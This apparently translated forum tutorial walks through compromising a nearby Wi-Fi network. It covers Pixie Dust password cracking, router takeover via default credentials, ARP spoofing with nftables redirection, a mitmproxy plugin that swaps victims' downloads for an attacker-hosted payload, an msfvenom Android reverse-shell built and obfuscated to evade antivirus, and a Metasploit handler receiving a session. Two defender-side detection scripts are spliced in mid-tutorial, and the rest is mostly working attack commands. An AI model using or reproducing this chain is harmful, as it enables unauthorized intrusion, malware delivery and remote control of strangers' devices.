Target Wi-Fi pwn -> MITM file injection -> meterpreter session (or another article on MITM)

Tr0jan_Horse

In general, what we need:
oneshot.py - a kind of analogue of all WiFi, Airgeddon, WiFiautopnevner, which works even on a Nokia without monitor mode
arpspoof - the binary version; it spoofs MAC addresses much more stably than its analogues
bettercap2 (purely for visualizing the process, plus its very convenient net.sniff sniffer)
mitmproxy 6 dev - a serious tool. It is used as a traffic analyzer and, strictly speaking, as a transparent proxy.
a couple of lines of Python, as a plugin for mitmproxy
msfvenom - our implant generator
msfconsole - our backconnect handler :D
Obfuscapk - an open-source APK crypter

1)
Bash:
ifconfig wlx00c0caa79483 down && macchanger -r wlx00c0caa79483
2)
We pull up in our car to the victim's window.
It is worth noting here that if your target is quite far from you and there is no way to get closer, then you can get out of the car and walk, remembering that radio waves tend to reflect off surfaces (especially concrete) and "slide" over water.
We open the laptop, take the card and the directional antenna, point it at the victim's window and launch

Bash:
./oneshot.py -i wlx00c0caa79483 -K -F
We get a list of victims, choose one, and get the password. How the Pixie Dust attack works can be read on the Internet.
If you are on Linux:
Bash:
nano /etc/network/interfaces
Code:
auto wlx00c0caa79483
allow-hotplug wlx00c0caa79483
iface wlx00c0caa79483 inet dhcp

wpa-essid target_name
wpa-psk target_passswd

If you are not on Linux, install Linux.
Bash:
service networking restart

An important point: NetworkManager is not compatible with networking; these are two different services on Linux systems. Usually both are present out of the box, but the default one, NetworkManager, wins. I don't like it, since it often interferes and reconnects on its own to whatever has a better signal and the like. So we turn it off and turn on networking.

Next, let's see what we have on the network:
Code:
wlx00c0caa79483: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.113 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::5c6f:c8ff:fe3c:e0e1 prefixlen 64 scopeid 0x20<link>
ether 5e:6f:c8:3c:e0:e1 txqueuelen 1000 (Ethernet)
RX packets 1100433 bytes 1173759849 (1.0 GiB)
RX errors 0 dropped 16688 overruns 0 frame 0
TX packets 630981 bytes 285821634 (272.5 MiB)
TX errors 0 dropped 1 overruns 0 carrier 0 collisions 0
You will see something like this, only with your own interface name.

3)
Let's look at the gateway:
# route -n
Code:
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlx00c0caa79483
169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlx00c0caa79483
192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 wlx00c0caa79483
We open 192.168.0.1 in the browser; the victim's router's login page is often hanging there. admin:admin -> we get into the router.
If admin:admin doesn't work -> then we google what the default is and get into the router. If we can't google it, then we try one way or another, or brute-force it.

You can also run nmap on the gateway and see what is running on it. It happens that there are several routers in one network. And it happens that the router has port 22 open that you can connect to via telnet.

Why? To cut out client isolation and all sorts of firewalls.

Once that's done, let's move on

# nmap -sS -sV -T4 -O -Pn -T 5 192.168.0.0/24
Nmap scan report for 192.168.0.103
Host is up (0.035s latency).
All 1000 scanned ports on 192.168.0.103 are closed (956) or filtered (44)
MAC Address: FE:F5:82:11:F9:0F (Unknown)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
or, if you prefer, bettercap2 is also possible:
# net.sniff on; net.show ;
Code:
┌───────────────┬───────────────────┬─────────────────┬───────────────────────────────┬───────┬───────┬──────────┐
│     IP ▴      │        MAC        │      Name       │            Vendor             │ Sent  │ Recvd │   Seen   │
├───────────────┼───────────────────┼─────────────────┼───────────────────────────────┼───────┼───────┼──────────┤
│ 192.168.0.113 │ 5e:6f:c8:3c:e0:e1 │ wlx00c0caa79483 │                               │ 0 B   │ 0 B   │ 09:17:23 │
│ 192.168.0.1   │ c4:71:54:c3:9b:a6 │ gateway         │ Tp-Link Technologies Co.,Ltd. │ 25 kB │ 27 kB │ 09:17:23 │
│               │                   │                 │                               │       │       │          │
│ 192.168.0.2   │ 30:b5:c2:d3:72:8a │                 │ Tp-Link Technologies Co.,Ltd. │ 32 kB │ 28 kB │ 09:17:48 │
│ 192.168.0.100 │ d0:03:df:1b:0f:b7 │                 │ Samsung Electronics Co.,Ltd   │ 0 B   │ 0 B   │ 09:17:36 │
│ 192.168.0.102 │ c8:3d:dc:12:35:55 │                 │                               │ 30 kB │ 31 kB │ 09:17:48 │
│ 192.168.0.103 │ fe:f5:82:11:f9:0f │                 │                               │ 23 kB │ 25 kB │ 09:17:46 │
│ 192.168.0.104 │ b4:74:43:f9:b8:11 │                 │ Samsung Electronics Co.,Ltd   │ 38 kB │ 41 kB │ 09:17:46 │
│ 192.168.0.106 │ 9c:4e:36:6b:1d:98 │                 │ Intel Corporate               │ 0 B   │ 37 kB │ 09:17:36 │
└───────────────┴───────────────────┴─────────────────┴───────────────────────────────┴───────┴───────┴──────────┘
So, we have picked the target; it's time to spoof it, that is, to shout to the entire local network that I am the router, not him, so send all your packets to me.

For this we will launch mitmproxy, having first written a plugin for it, redirect_requests.py
Python:
import mitmproxy
import subprocess
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    if flow.request.host != "your_server" and flow.request.pretty_url.endswith(".exe") or flow.request.pretty_url.endswith(".cab"):
        print("[+] О, Look, the bastard is downloading something for Windows.")
        #flow.request.host = "mitmproxy.org"
        front_file = flow.request.pretty_url + "#"
        flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location":"http://your_server/EU.exe"})
        print("[?] All fascists get a grenade!")

    if flow.request.host != "your_server" and flow.request.pretty_url.endswith(".apk") or flow.request.pretty_url.endswith(".pdf"):
        print("[+] О, Look, the bastard is downloading something for Android.")
        front_file = flow.request.pretty_url + "#"
        flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location":"http://your_server/calc.apk"})
        print("[?] All fascists get a grenade!")
The meaning of the script is simple: if mitmproxy sees that the victim wants to download an apk or pdf (for example), then it is sent to our server instead of the original one, where the pre-prepared (who? right, the payload) is already waiting!
# mitmproxy --mode transparent --rawtcp --ssl-insecure --listen-host 192.168.0.113 --server --listen-port 8080 --anticomp --showhost --anticache -s ../complex/sslstrip.py -s redirect_requests.py
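As an added, defender-side example (not code from the original post or from mitmproxy): seen from a proxy or web-gateway log, the pattern the plugin above produces is a request for an installer that is answered with a 30x whose Location points at a different host, sometimes with a changed file type as well. The records, hostnames and the 203.0.113.5 address below are constructed for the example.

```python
"""Flag download requests that were answered with a redirect to another host.

Added example, not code from the original post or from mitmproxy: a defender-side
check over proxy / web-gateway log records. Hostnames, the 203.0.113.5 address and
the records themselves are constructed for the example.
"""
from posixpath import splitext
from urllib.parse import urlsplit

# File types the post's plugin keys on; widen as needed in a real deployment.
WATCHED_EXTENSIONS = (".exe", ".cab", ".apk", ".pdf")

# Constructed records: (client, requested URL, status code, Location header or None)
SAMPLE_LOG = [
    ("192.168.0.103", "http://downloads.example.com/setup.exe", 301,
     "http://203.0.113.5/EU.exe"),
    ("192.168.0.104", "http://mirror.example.org/app.apk", 200, None),
    ("192.168.0.104", "http://mirror.example.org/old/app.apk", 302,
     "https://mirror.example.org/new/app.apk"),
    ("192.168.0.106", "http://cdn.example.net/report.pdf", 301,
     "http://203.0.113.5/calc.apk"),
]


def extension_of(url: str) -> str:
    """Lower-cased file extension of the URL path ('' when there is none)."""
    return splitext(urlsplit(url).path)[1].lower()


def is_download_request(url: str) -> bool:
    """True when the requested path ends in one of the watched file types."""
    return extension_of(url) in WATCHED_EXTENSIONS


def redirect_reasons(url: str, location: str) -> list:
    """Why a redirect of a download looks suspicious; empty list means benign."""
    reasons = []
    if urlsplit(url).hostname != urlsplit(location).hostname:
        reasons.append("redirected to a different host")
    if extension_of(location) != extension_of(url):
        reasons.append("file type changed %s -> %s"
                       % (extension_of(url), extension_of(location)))
    return reasons


def find_hijacked_downloads(records):
    """Return one dict per suspicious redirect, in log order."""
    hits = []
    for client, url, status, location in records:
        if not (300 <= status < 400) or not location:
            continue  # not a redirect
        if not is_download_request(url):
            continue  # not a file type we watch
        reasons = redirect_reasons(url, location)
        if reasons:
            hits.append({"client": client, "url": url,
                         "location": location, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_hijacked_downloads(SAMPLE_LOG):
        print(hit["client"], hit["url"], "->", hit["location"],
              ";", "; ".join(hit["reasons"]))
```

Run against the constructed records it reports the two 301s to 203.0.113.5 and stays quiet on the same-host 302, which is what a legitimate mirror move looks like. The same check is cheap to express as a rule in a web gateway that logs the Location header.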

Nothing yet. Now we need to check whether everything is as we intended, and run arpspoof
# arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1


The syntax is not difficult to understand: -t is the attacked host, and after it, with no flag, comes the gateway, that is, the router.
Spoofing has started, and if everything is done correctly you will see packets going through our transparent proxy. But you will not see this yet, because first you need to set up forwarding. This is an interesting topic, and I will share with you one trick that works. First, put aside your iptables, iptables-legacy and so on; they are all already deprecated and will soon stop working. Time to study nf_tables.
so turn on arpspoof for now!
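The detection counterpart of this step, as an added example that is not part of the original post and not code from arpspoof or bettercap: a small Python checker over ARP "is-at" observations (what a sniffer or a periodic neighbour-table dump yields) that alerts when an IP, and especially the gateway, starts answering from a MAC that another host already claims. The observations are constructed; the IP/MAC pairs reuse the lab subnet shown above.

```python
"""Alert when a LAN host (especially the gateway) starts answering ARP from a MAC
that already belongs to someone else.

Added example, not code from the original post or from arpspoof/bettercap: a
defender-side checker over ARP "is-at" observations. Observations are constructed;
the IP/MAC pairs reuse the lab subnet shown in the post.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"

# Constructed observations: (time, ip, mac) from ARP replies or `ip neigh` dumps
OBSERVATIONS = [
    ("09:17:23", "192.168.0.1",   "c4:71:54:c3:9b:a6"),  # real gateway
    ("09:17:23", "192.168.0.113", "5e:6f:c8:3c:e0:e1"),  # another LAN host
    ("09:17:46", "192.168.0.103", "fe:f5:82:11:f9:0f"),
    ("09:41:30", "192.168.0.1",   "5e:6f:c8:3c:e0:e1"),  # gateway now "is-at" .113's MAC
    ("09:41:31", "192.168.0.103", "5e:6f:c8:3c:e0:e1"),  # .103 is claimed by the same MAC
]


def detect_arp_spoof(observations, gateway_ip=GATEWAY_IP):
    """Replay observations in order; return an alert for every IP->MAC change."""
    ip_to_mac = {}                   # last MAC seen for each IP
    mac_to_ips = defaultdict(set)    # which IPs a MAC currently claims
    alerts = []
    for when, ip, mac in observations:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            others = mac_to_ips[mac] - {ip}   # IPs this MAC already answers for
            # A gateway flip, or one MAC answering for several IPs, is the
            # signature of ARP cache poisoning rather than a benign NIC swap.
            severity = "high" if ip == gateway_ip or others else "low"
            alerts.append({"time": when, "ip": ip, "old_mac": previous,
                           "new_mac": mac, "mac_also_claimed_by": sorted(others),
                           "severity": severity})
            mac_to_ips[previous].discard(ip)
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for a in detect_arp_spoof(OBSERVATIONS):
        print("[%s] %s: %s moved %s -> %s (also claimed by %s)" % (
            a["severity"], a["time"], a["ip"], a["old_mac"], a["new_mac"],
            ", ".join(a["mac_also_claimed_by"]) or "nobody"))
```

On the constructed data the checker raises two high-severity alerts: the gateway's IP moving to a MAC that already belongs to 192.168.0.113, and then 192.168.0.103 being claimed by that same MAC. On a managed switch the equivalent control is Dynamic ARP Inspection; on a single host, a static (permanent) neighbour entry for the gateway stops the poisoned reply from being accepted at all.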

First, let's create the mitm.conf config
Code:
table ip filter {
    chain FORWARD {
        type filter hook forward priority 0; policy accept;
    }

    chain INPUT {
        type filter hook input priority 0; policy accept;
    }

    chain OUTPUT {
        type filter hook output priority 0; policy accept;
    }
}
table ip nat {
    chain PREROUTING {
        type nat hook prerouting priority -100; policy accept;
        iifname "wlx00c0caa79483" tcp dport http counter packets 97 bytes 5804 dnat to 192.168.0.113:http-alt
        iifname "wlx00c0caa79483" tcp dport https counter packets 62 bytes 4231 dnat to 192.168.0.113:http-alt
        iifname "wlx00c0caa79483" meta l4proto tcp ip daddr 192.168.0.0/24 tcp dport 80 counter packets 0 bytes 0 dnat to 192.168.0.113:8080
        iifname "wlx00c0caa79483" meta l4proto tcp ip daddr 192.168.0.0/24 tcp dport 443 counter packets 0 bytes 0 dnat to 192.168.0.113:8080

    }

    chain INPUT {
        type nat hook input priority 100; policy accept;
    }

    chain POSTROUTING {
        type nat hook postrouting priority 100; policy accept;
        oifname "wlx00c0caa79483" counter packets 0 bytes 0 masquerade
    }

    chain OUTPUT {
        type nat hook output priority -100; policy accept;
    }
}
then we write:
# nft flush ruleset && nft -f /root/mitm.conf && nft list ruleset
In response you should see approximately what you wrote in the file. The counter values change dynamically; this is normal.
Of course, don't forget to enable forwarding.
# sysctl net.ipv4.conf.all.forwarding=1
# sysctl net.ipv6.conf.all.forwarding=1

everything should work, yo)

ah, yes. one more detail.

go to bettercap2 and write
help any.proxy
Code:
any.proxy (not running): A firewall redirection to any custom proxy.

   any.proxy on : Start the custom proxy redirection.
  any.proxy off : Stop the custom proxy redirection.

  Parameters

  any.proxy.dst_address : Address where the proxy is listening. (default=<interface address>)
     any.proxy.dst_port : Port where the proxy is listening. (default=8080)
        any.proxy.iface : Interface to redirect packets from. (default=<interface name>)
     any.proxy.protocol : Proxy protocol. (default=TCP)
  any.proxy.src_address : Leave empty to intercept any source address. (default=)
     any.proxy.src_port : Remote port to redirect when the module is activated. (default=80)
In principle, everything should work by default. If not, then set the values.
Code:
192.168.0.0/24 > 192.168.0.113  » any.proxy on
[09:41:19] [sys.log] [inf] any.proxy Applied redirection [wlx00c0caa79483] (TCP) :80 -> 192.168.0.113:8080
and now, for real:
# arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1


Did everything work out? Did the packets go through us? Not bad, bro. Now it's time to sort out the payload)

we open the server via ssh and write

# msfvenom --platform android -a dalvik -p android/meterpreter/reverse_tcp LHOST=our_device LPORT=4444 -o payload.apk
Code:
No encoder or badchars specified, outputting raw payload
Payload size: 10178 bytes
Saved as: payload.apk
We get payload.apk, but any AV will bark at it like an Alabai at a drunk at three in the morning in the private sector.

That's why we use Obfuscapk

# python3.7 -m obfuscapk.cli -p -w ~/Fatrat_Generated/obf/ -d ~/Fatrat_Generated/obf.apk -o ConstStringEncryption -o Nop -o Goto -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment ~/Fatrat_Generated/app_backdoor.apk
Running obfuscators (NewAlignment): 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████|[01:01<00:00, 8.84s/obfuscator]
files: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████|[00:07<00:00, 984.63file/s]
we will put the received obf.apk on our server and call it, for example, calc.apk

launch metasploit
# msfconsole
Code:
=[ metasploit v5.0.67-dev- ]
+ -- --=[ 1957 exploits - 1092 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Code:
use exploit/multi/handler
msf5 exploit(multi/handler) >
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
# handler -H 0.0.0.0 -P 4444 -n op6 -p android/meterpreter/reverse_tcp

[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 0.0.0.0:4444
That's it. We wait until the victim launches the payload.

[*] Sending stage (73560 bytes) to 79.110.129.176
[*] Meterpreter session 1 opened (твой_ипи:4444 -> 79.110.129.176:25463) at 2020-01-06 11:14:42 +0300
sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter dalvik/android u0_a289 @ localhost твой_ипи:4444 -> 79.110.129.176:25463 (fe80::805d:26ff:fec8:b98e)

p.s. don't forget to turn on arpspoof so it doesn't interfere.

Have a good day!